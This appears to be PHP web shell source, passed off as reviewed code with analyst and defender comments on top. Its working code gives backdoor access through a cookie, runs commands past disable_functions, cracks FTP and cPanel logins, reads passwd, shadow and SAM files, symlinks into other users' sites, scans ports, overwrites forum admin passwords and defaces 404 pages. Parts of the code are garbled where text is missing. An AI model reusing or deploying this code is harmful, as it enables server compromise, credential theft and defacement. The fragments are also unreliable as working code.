$k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");"); } } }
// NOTE(review): everything from the top of this span down to the two closing
// braces below is the tail of a definition that begins before this excerpt; it
// is left exactly as found. The visible part streams $file to the client as an
// attachment in 65536-byte reads.
fclose ($fp);
header("Content-Disposition: attachment; filename=" . $file);
header("Content-Type: application/download");
header("Content-Length: " . filesize($file));
flush();
$fp = fopen($file, "r");
while (!feof($fp)) { echo fread($fp, 65536); flush(); }
fclose($fp);
} }

// Echoes an empty string.
// NOTE(review): presumably this printed the page's inline style block and the
// markup was stripped from this copy - confirm against an intact sample.
function shellstyle() { echo ""; }

// Access gate for the rest of the script: the branch runs only when the request
// carries a cookie named "hacked" whose value equals md5($pass). $pass is
// assigned outside this excerpt.
// Analyst notes (web shell, MITRE ATT&CK T1505.003):
//  - The cookie name and a 32-hex-character value are usable indicators in
//    access logs or WAF rules for this sample.
//  - The cookie value is the bare MD5 digest, so anyone who has observed it in
//    transit or in logs can replay it; treat a host carrying this file as
//    reachable by third parties, not only by whoever planted it.
if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass)) {
    $self=$_SERVER["PHP_SELF"];
    $os = "N/D";
    $bdmessage = null;
    $dir = getcwd();
    // Platform is inferred from php_uname(). $directorysperator is assigned only
    // in these two branches within this span.
    if(stristr(php_uname(),"Windows")) { $SEPARATOR = '\\'; $os = "Windows"; $directorysperator="\\"; }
    else if(stristr(php_uname(),"Linux")) { $os = "Linux"; $directorysperator='/'; }

    // Splits path $d on $directsperator, drops the last two segments and joins
    // the remainder with the same separator.
    // implode() is called in the legacy (array, separator) argument order.
    function Trail($d,$directsperator) {
        $d=explode($directsperator,$d);
        array_pop($d);
        array_pop($d);
        $str=implode($d,$directsperator);
        return $str;
    }

    // Makes one FTP login attempt against $host with $user/$pass through cURL.
    // curl_errno() 28 (operation timed out) prints a timeout message and ends the
    // whole script; curl_errno() 0 prints the credential pair as a hit; any other
    // error code prints nothing.
    // Defender notes: the attempt originates from the compromised web server, so
    // it shows up as outbound FTP authentication traffic from the web-server
    // process; egress filtering on that host and lockout/rate limiting on the FTP
    // service are the relevant controls.
    function ftp_check($host,$user,$pass,$timeout) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "ftp://$host");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
        curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
        curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
        curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_FAILONERROR, 1);
        $data = curl_exec($ch);
        // NOTE(review): the quoting inside the success message below is damaged in
        // this copy (an escaping backslash before the first inner quote appears to
        // be missing); the text is kept byte-for-byte.
        if ( curl_errno($ch) == 28 ) { print "
Error : Connection Timeout. Please Check The Target Hostname .
";exit; } else if ( curl_errno($ch) == 0 ) { print "
[~] Cracking Success With Username "$user\" and Password \"$pass\"


"; }
        curl_close($ch);
    }

    // Same single-attempt check as ftp_check(), but over HTTP Basic authentication
    // against http://$host on the port held in the global $cpanel_port (assigned
    // outside this excerpt). Result handling is identical: error 28 ends the
    // script, error 0 prints the pair, anything else is silent.
    // Defender notes: on the target side this appears as a series of Basic-auth
    // requests from one source address; failed-login throttling on the panel and
    // alerting on bursts of 401 responses cover it.
    function cpanel_check($host,$user,$pass,$timeout) {
        global $cpanel_port;
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
        curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
        curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_FAILONERROR, 1);
        $data = curl_exec($ch);
        if ( curl_errno($ch) == 28 ) { print "
Error : Connection Timeout. Please Check The Target Hostname.
";exit;} else if ( curl_errno($ch) == 0 ){ print "[~] Cracking Success With Username "$user\" and Password \"$pass\"

"; }
        curl_close($ch);
    }

    // Database functions
    // NOTE(review): only the first statement of listdatabase() lies in this span;
    // the function continues after the closing PHP tag and is not documented here.
    function listdatabase() { $self=$_SERVER["PHP_SELF"]; ?>

\n"; $pDB = mysql_list_dbs( $mysqlHandle ); $num = mysql_num_rows( $pDB ); for( $i = 0; $i < $num; $i++ ) { $dbname = mysql_dbname( $pDB, $i ); mysql_select_db($dbname,$mysqlHandle); $result = mysql_query("SHOW TABLES"); $num_of_tables = mysql_num_rows($result); echo "\n"; echo "$dbname ($num_of_tables)\n"; echo "Tables\n"; echo "Drop\n"; echo "Dump\n"; echo "\n"; } echo "\n"; mysql_close($mysqlHandle); } function listtable() { $self=$_SERVER["PHP_SELF"]; $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; echo "
[ $dbname ] - > Database List   [ Log Out ]
"; ?>


Error : $msg

\n"; return; } $num = mysql_num_rows( $pTable ); echo "\n"; for( $i = 0; $i < $num; $i++ ) { $tablename = mysql_tablename( $pTable, $i ); $result = mysql_query("select * from $tablename"); $num_rows = mysql_num_rows($result); echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; } echo "
\n"; echo "$tablename ($num_rows)\n"; echo "\n"; echo "Schema\n"; echo "\n"; echo "Data\n"; echo "\n"; echo "Empty\n"; echo "\n"; echo "Drop\n"; echo "
"; mysql_close($mysqlHandle); echo "

[ $dbname ] - > Database List   [ Log Out ]
"; } function paramexe($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, "\n") === false) echo '' . $v . '
'; else echo '
' . $v . '
'; } }

// Recursively deletes $dir: every entry other than '.' and '..' is unlinked
// (files) or recursed into (directories), then the emptied directory itself is
// removed. Does nothing when $dir is not a directory. The results of unlink()
// and rmdir() are not checked.
function rrmdir($dir) {
    if (is_dir($dir)) // ensures that we actually have a directory
    {
        $objects = scandir($dir); // gets all files and folders inside
        foreach ($objects as $object) {
            if ($object != '.' && $object != '..') {
                if (is_dir($dir . '/' . $object)) {
                    // if we find a directory, do a recursive call
                    rrmdir($dir . '/' . $object);
                } else {
                    // if we find a file, simply delete it
                    unlink($dir . '/' . $object);
                }
            }
        }
        // the original directory is now empty, so delete it
        rmdir($dir);
    }
}

// Runs "which $pr" through execmd() and returns the trimmed result, or the
// trimmed input name when that result is empty. $pr is interpolated into the
// command string without escaping.
function which($pr) {
    $path = execmd("which $pr");
    if(!empty($path)) return trim($path);
    else return trim($pr);
}

// Returns $text unchanged when magic quotes are off, otherwise with the added
// slashes removed. Relies on get_magic_quotes_gpc(), which no longer exists in
// PHP 8.
function magicboom($text) {
    if (!get_magic_quotes_gpc()) return $text;
    return stripslashes($text);
}

// Runs the shell command $cmd.
//   $d_functions  comma-separated list of disabled function names in the form
//                 returned by getDisabledFunctions(), or the string "None".
// With "None" the command goes straight to passthru(). Otherwise the fixed list
// $funcs is walked in order and the first entry not named in $d_functions is
// used. Returns that call's result, or -1 when no pipe could be opened or every
// entry is disabled. Errors are suppressed with @ throughout.
// Defender notes: because this helper falls through six different execution
// functions, a disable_functions setting that omits any one of them does not
// stop command execution by code like this. Controls that do not depend on that
// list - alerting on the web-server account spawning child processes, and
// running PHP under a confined, unprivileged account - are the dependable ones.
function execmd($cmd,$d_functions="None") {
    if($d_functions=="None") { $ret=passthru($cmd); return $ret; }
    $funcs=array("shell_exec","exec","passthru","system","popen","proc_open");
    $d_functions=str_replace(" ","",$d_functions);
    $dis_funcs=explode(",",$d_functions);
    foreach($funcs as $safe) {
        if(!in_array($safe,$dis_funcs)) {
            if($safe=="exec") { $ret=@exec($cmd); $ret=join("\n",$ret); return $ret; }
            elseif($safe=="system") { $ret=@system($cmd); return $ret; }
            elseif($safe=="passthru") { $ret=@passthru($cmd); return $ret; }
            elseif($safe=="shell_exec") { $ret=@shell_exec($cmd); return $ret; }
            elseif($safe=="popen") {
                $ret=@popen("$cmd",'r');
                if(is_resource($ret)) {
                    while(@!feof($ret)) $read.=@fgets($ret);
                    @pclose($ret);
                    return $read;
                }
                return -1;
            }
            elseif($safe="proc_open") {
                $cmdpipe=array( 0=>array('pipe','r'), 1=>array('pipe','w') );
                $resource=@proc_open($cmd,$cmdpipe,$pipes);
                if(@is_resource($resource)) {
                    while(@!feof($pipes[1])) $ret.=@fgets($pipes[1]);
                    @fclose($pipes[1]);
                    @proc_close($resource);
                    return $ret;
                }
                return -1;
            }
        }
    }
    return -1;
}

// Returns the disable_functions ini value, or the string "None" when it is
// empty. This is the value execmd() expects as its second argument.
function getDisabledFunctions() {
    if(!ini_get('disable_functions')) { return "None"; }
    else { return @ini_get('disable_functions'); }
}

// Builds an ls-style ten-character mode string for $file from fileperms(): one
// file-type character followed by owner, group and world rwx triplets, with
// s/S and t/T standing in for x where the setuid, setgid or sticky bit is set.
function getFilePermissions($file) {
    $perms = fileperms($file);
    if (($perms & 0xC000) == 
0xC000) {
        // Socket
        $info = 's';
    } elseif (($perms & 0xA000) == 0xA000) {
        // Symbolic Link
        $info = 'l';
    } elseif (($perms & 0x8000) == 0x8000) {
        // Regular
        $info = '-';
    } elseif (($perms & 0x6000) == 0x6000) {
        // Block special
        $info = 'b';
    } elseif (($perms & 0x4000) == 0x4000) {
        // Directory
        $info = 'd';
    } elseif (($perms & 0x2000) == 0x2000) {
        // Character special
        $info = 'c';
    } elseif (($perms & 0x1000) == 0x1000) {
        // FIFO pipe
        $info = 'p';
    } else {
        // Unknown
        $info = 'u';
    }
    // Owner
    $info .= (($perms & 0x0100) ? 'r' : '-');
    $info .= (($perms & 0x0080) ? 'w' : '-');
    $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));
    // Group
    $info .= (($perms & 0x0020) ? 'r' : '-');
    $info .= (($perms & 0x0010) ? 'w' : '-');
    $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));
    // World
    $info .= (($perms & 0x0004) ? 'r' : '-');
    $info .= (($perms & 0x0002) ? 'w' : '-');
    $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 
'T' : '-'));
    return $info;
}

// Returns the mode string of $filename wrapped in one of three string pairs,
// chosen by whether the file is unreadable, read-only or writable.
// NOTE(review): all three wrappers are empty strings in this copy - presumably
// colour markup that was stripped - so the branches are indistinguishable here.
function filepermscolor($filename) {
    if(!@is_readable($filename)) return "".getFilePermissions($filename)."";
    else if(!@is_writable($filename)) return "".getFilePermissions($filename)."";
    else return "".getFilePermissions($filename)."";
}

// One-line environment reporters. Each echoes a single value (client address,
// PHP version, magic-quotes state, server address and port, server admin,
// uname string, server software) or "Enabled"/"Disabled" for whether a given
// extension function exists. safe() is the exception: it returns its string
// instead of echoing, based on the global $sm, which is assigned outside this
// excerpt.
function yourip() { echo $_SERVER["REMOTE_ADDR"]; }
function phpver() { $pv=@phpversion(); echo $pv; }
function magic_quote() { echo get_magic_quotes_gpc()?"ON":"OFF"; }
function serverip() { echo getenv('SERVER_ADDR'); }
function serverport() { echo $_SERVER['SERVER_PORT']; }
function safe() { global $sm; return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF"; }
function serveradmin() { echo $_SERVER['SERVER_ADMIN']; }
function systeminfo() { echo php_uname(); }
function curlinfo() { echo function_exists('curl_version')?("Enabled"):("Disabled"); }
function oracleinfo() { echo function_exists('ocilogon')?("Enabled"):("Disabled"); }
function mysqlinfo() { echo function_exists('mysql_connect')?("Enabled"):("Disabled"); }
function mssqlinfo() { echo function_exists('mssql_connect')?("Enabled"):("Disabled"); }
function postgresqlinfo() { echo function_exists('pg_connect')?("Enabled"):("Disabled"); }
function softwareinfo() { echo getenv("SERVER_SOFTWARE"); }

// NOTE(review): text is missing from this copy inside the for-header below
// (between "$i" and "$mod"), so download() runs straight into the tail of what
// looks like a size-formatting helper and the result does not parse. The visible
// start of download() reads the "download" query parameter and splits it on "/".
// Left exactly as found.
function download() { $frd=$_GET['download']; $prd=explode("/",$frd); for($i=0;$i $mod; $i++) { $size /= $mod; } return round($size, 2) . ' ' . $units[$i]; }

// Iterates the drive letters A to Z and, for each one that is_dir() accepts as
// "<letter>:\", stores that root path in $myd.
// NOTE(review): the rest of the function is lost after the closing PHP tag; the
// text that follows it on the same line appears to be the tail of a separate
// helper. Left exactly as found.
function showDrives() { global $self; foreach(range('A','Z') as $drive) { if(is_dir($drive.':\\')) { $myd = $drive.":\\"; ?> ' . $n . ': '; if(strpos($v, "\n") === false) echo '' . $v . '
'; else echo '
' . $v . '
'; } } myparam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) myparam('Loaded Apache modules', implode(', ', apache_get_modules())); myparam('Open base dir', @ini_get('open_basedir')); myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); myparam('Safe mode include dir', @ini_get('safe_mode_include_dir')); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; myparam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'Linux') { myparam('Distro : ', myexe("cat /etc/*-release")); myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); myparam('OS version', @file_get_contents('/proc/version')); myparam('Distr name', @file_get_contents('/etc/issue.net')); myparam('Where is Perl?', myexe('whereis perl')); myparam('Where is Python?', myexe('whereis python')); myparam('Where is gcc?', myexe('whereis gcc')); myparam('Where is apache?', myexe('whereis apache')); myparam('CPU?', myexe('cat /proc/cpuinfo')); myparam('RAM', myexe('free -m')); myparam('Mount options', myexe('cat /etc/fstab')); myparam('User Limits', myexe('ulimit -a')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(thiscmd($item)) $temp[] = $item; myparam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(thiscmd($item)) $temp[] = $item; myparam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(thiscmd($item)) $temp[] = $item; myparam('Downloaders', implode(', ',$temp)); echo '
'; myparam('HDD space', myexe('df -h')); myparam('Hosts', @file_get_contents('/etc/hosts')); } } else { $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam"); $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts"); $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks"); $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam"); echo "Password File : Download password file
"; echo "Config Files : [ Hosts ]  [ Local Network Map ]  [ lmhosts ]
"; $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; echo "Open Base Dir : " . $base . "
"; myparam('OS Version',myexe('ver')); myparam('Account Settings',myexe('net accounts')); myparam('User Accounts',myexe('net user')); } echo ''; }
// NOTE(review): the line above is the tail of a definition that begins before
// this span; it is left exactly as found. What is visible passes the output of
// the Windows commands "ver", "net accounts" and "net user" to myparam().

// Runs the shell command $in and returns its raw output as a string.
// The execution function is chosen by function_exists() in this order: exec,
// passthru, system, shell_exec, popen. Output of passthru()/system() is captured
// with output buffering. Returns '' when none of the five is available. Errors
// are suppressed with @.
// Defender notes: the output is returned unescaped, and the fall-through order
// means a host is exposed as long as any one of these functions is callable.
function myexe($in) {
    $out = '';
    if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); }
    elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); }
    elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); }
    elseif (function_exists('shell_exec')) { $out = shell_exec($in); }
    elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); }
    return $out;
}

// Runs the shell command $command and returns its output passed through
// htmlspecialchars().
// The execution function is chosen by function_exists() in this order: exec,
// shell_exec, popen, system, passthru, proc_open. For the two pipe-based
// variants the output is read in 512-byte steps with fread(), or with fgets()
// when fread() is unavailable.
// Defender notes: same exposure as myexe() with proc_open added to the list;
// detection is better anchored on process creation by the web-server account
// than on PHP configuration.
function exec_all($command) {
    $output = '';
    if(function_exists('exec')) {
        exec($command,$output);
        $output = join("\n",$output);
    } else if(function_exists('shell_exec')) {
        $output = shell_exec($command);
    } else if(function_exists('popen')) {
        $handle = popen($command , "r"); // Open the command pipe for reading
        if(is_resource($handle)) {
            if(function_exists('fread') && function_exists('feof')) {
                while(!feof($handle)) { $output .= fread($handle, 512); }
            } else if(function_exists('fgets') && function_exists('feof')) {
                while(!feof($handle)) { $output .= fgets($handle,512); }
            }
        }
        pclose($handle);
    } else if(function_exists('system')) {
        ob_start(); // start output buffering
        system($command);
        $output = ob_get_contents(); // Get the output
        ob_end_clean(); // Stop output buffering
    } else if(function_exists('passthru')) {
        ob_start(); // start output buffering
        passthru($command);
        $output = ob_get_contents(); // Get the output
        ob_end_clean(); // Stop output buffering
    } else if(function_exists('proc_open')) {
        $descriptorspec = array( 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
        );
        $handle = proc_open($command ,$descriptorspec , $pipes); // the child's pipe handles are placed in $pipes
        if(is_resource($handle)) {
            if(function_exists('fread') && function_exists('feof')) {
                while(!feof($pipes[1])) { $output .= fread($pipes[1], 512); }
            } else 
if(function_exists('fgets') && function_exists('feof')) {
                while(!feof($pipes[1])) { $output .= fgets($pipes[1],512); }
            }
        }
        pclose($handle);
    }
    return(htmlspecialchars($output));
}

// "ON" when the open_basedir ini value is non-empty, otherwise "OFF".
$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
// "Yes" when the PHP process can read /etc/passwd, otherwise "No".
$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";

// Returns an owner/group label.
// Without the POSIX extension (posix_getegid missing) the label is built from
// getmyuid() and getmygid() as "uid/gid" and $value is ignored. With it, the
// label is the owner name and group name of the path $value, joined by " / ".
function getOGid($value) {
    if(!function_exists('posix_getegid')) {
        $user = @get_current_user();
        $uid = @getmyuid();
        $gid = @getmygid();
        $group = "?";
        $owner = $uid . "/". $gid;
        return $owner;
    } else {
        $name=@posix_getpwuid(@fileowner($value));
        $group=@posix_getgrgid(@filegroup($value));
        $owner = $name['name']. " / ". $group['name'];
        return $owner;
    }
}

// Directory-listing routine.
// NOTE(review): only the opening part lies in this span; the body continues
// past it and the markup it emitted is missing from this copy. The visible part
// reads $dir with opendir()/readdir(), sorts the entries into $dirs and $files,
// counts them (the directory count is reduced by 2), merges both lists into
// $myfiles, and prints a message when scandir() fails on a directory.
function mainfun($dir) {
    global $ind, $directorysperator,$os;
    $mydir = basename(dirname(__FILE__));
    $pdir = str_replace($mydir,"",$dir);
    $pdir = str_replace("/","",$dir);
    $files = array();
    $dirs = array();
    $odir=opendir($dir);
    while($file = readdir($odir)) {
        if(is_dir($dir.'/'.$file)) { $dirs[]=$file; }
        else { $files[]=$file; }
    }
    $countfiles = count($dirs) + count($files);
    $dircount = count($dirs);
    $dircount = $dircount-2;
    $myfiles = array_merge($dirs,$files);
    $i = 0;
    if(is_dir($dir)) { if(scandir($dir) === false) echo "
Directory isn't readable
"; else { ?>
Owner / Group"; } ?> "; echo getOGid($dir).""; } ?> "; echo getOGid($val).""; } ?> "; echo getOGid($val).""; } ?> "; echo getOGid($val).""; } ?>


 
"; }} else { echo "

".$_GET['dir']." is NOT a Valid Directory!

"; } } if(isset($_REQUEST["script"])) { $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL); ?>
Listing folder ()
Name Size Permissions Modification Date Rename Download Action
[ . ]CURDIR
[ .. ]UPDIR
[ ] DIR Rename
". $val . ""; } else { echo $val; } ?> ( Deface IT )"; } } ?> Rename Download
| Do It Manually | | Do It Automatically |

12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); unlink("test.txt"); echo "
[ Done ]
"; echo "
| Go Here |
"; } else { $d0mains = @file("/etc/named.conf"); if($d0mains) { mkdir("dhanushST"); chdir("dhanushST"); foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); syml($user['name'],$domains[1][0]); } } } echo "
[ Done ]
"; echo "
| Go Here |
"; } else { mkdir("dhanushSPT"); chdir("dhanushSPT"); $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } echo '
'; $temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); echo ""; unlink("test.txt"); echo "
[ Done ]
"; echo "
| Go Here |
"; } } } else echo "
Cannot Complete the task!!!!
"; } else if(isset($_GET["symlinkfile"])) { if(!isset($_GET['file'])) { ?>


check symlink symlink'.$num.' file'; } else echo '
Cannot Create Symlink
'; } else if(isset($_REQUEST['404new'])) { ?>


Done setting 404 Page !!!!"; } else echo "
Cannot Set 404 Page
"; } else if(strlen($ind) != 0) { if($myfile = fopen(".htaccess", "a")) { fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r"); if($myfilee = fopen("404.html", "w+")) { fwrite($myfilee, base64_decode($ind)); fclose($myfilee); echo "
Done setting 404 Page !!!!
"; } fclose($myfile); } else { echo "
Cannot Set 404 Page
"; } } else echo "
Nothing Specified in the shell
"; } else if(isset($_GET["domains"])) { ?>
S. No.DomainsUsersSymlinkInformation"; $dcount = 1; foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo "" . $dcount . "".$domains[1][0]."".$user['name']."Symlinkinfo"; flush(); $dcount++; } } } echo ""; } else { if(stristr(php_uname(),"Linux")) { ?>
Get User Name
Enter Website Name :
S. No.UsersSymlink"; $dcount = 1; $file = fopen("/etc/passwd", "r"); //Output a line of the file until the end is reached while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo "" . $dcount . "" . $matches . ""; echo "Symlink"; $dcount++; } fclose($file); echo ""; } else { @mkdir("dhanush",0777); @chdir("dhanush"); execmd("ln -s / root"); $file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any '; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3); @fclose($fp3); echo ""; $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } echo '
'; $temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $dcount = 1; $file = fopen("test.txt", "r"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++; } fclose($file); echo "
S. No.UsersSymlink
" . $dcount . "" . $matches . "Symlink
"; unlink("test.txt"); } } else echo "
Cannot create Symlink
"; } } else if(isset($_GET['host']) && isset($_GET['protocol'])) { echo "Open Ports: "; $host = $_GET['host']; $proto = $_GET['protocol']; $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); for($current = 0; $current <= 23; $current++) { $currents = $myports[$current]; $service = getservbyport($currents, $proto); // Try to connect to port $result = fsockopen($host, $currents, $errno, $errstr, 1); // Show results if($result) echo "$currents, "; } } else if(isset($_REQUEST['forumpass'])) { $localhost = $_GET['f1']; $database = $_GET['f2']; $username = $_GET['f3']; $password = $_GET['f4']; $prefix = $_GET['prefix']; $newpass = $_GET['newpass']; $uid = $_GET['uid']; if($_GET['forums'] == "vb") { $newpass = $_GET['newipbpass']; $uid = $_GET['ipbuid']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); $salt = "eghjghrtd"; $newpassword = md5(md5($newpass) . 
$salt); if($prefix == "" || $prefix == null) $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'"); else $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "mybb") { $newpass = $_GET['newipbpass']; $uid = $_GET['ipbuid']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); $salt = "jeghj"; $newpassword = md5(md5($salt).md5($newpass)); if($prefix == "" || $prefix == null) $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'"); else $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "smf") { $newpass = $_GET['newipbpass']; $uid = $_GET['ipbuid']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); if($prefix == "" || $prefix == null) { $result = mysql_query("select member_name from smf_members where id_member = $uid"); $row = mysql_fetch_array($result); $membername = $row['member_name']; $newpassword = sha1(strtolower($membername).$newpass); $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'"); } else { $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid"); $row = mysql_fetch_array($result); $membername = $row['member_name']; $newpassword = sha1(strtolower($membername).$newpass); $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'"); } if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "phpbb") { 
$newpass = $_POST['newipbpass']; $uid = $_POST['ipbuid']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); $newpassword = md5($newpass); if(empty($prefix) || $prefix == null) $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'"); else $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "ipb") { $newpass = $_POST['newipbpass']; $uid = $_POST['ipbuid']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); $salt = "eghj"; $newpassword = md5(md5($salt).md5($newpass)); if($prefix == "" || $prefix == null) $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'"); else $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "wp") { $uname = $_GET['uname']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); 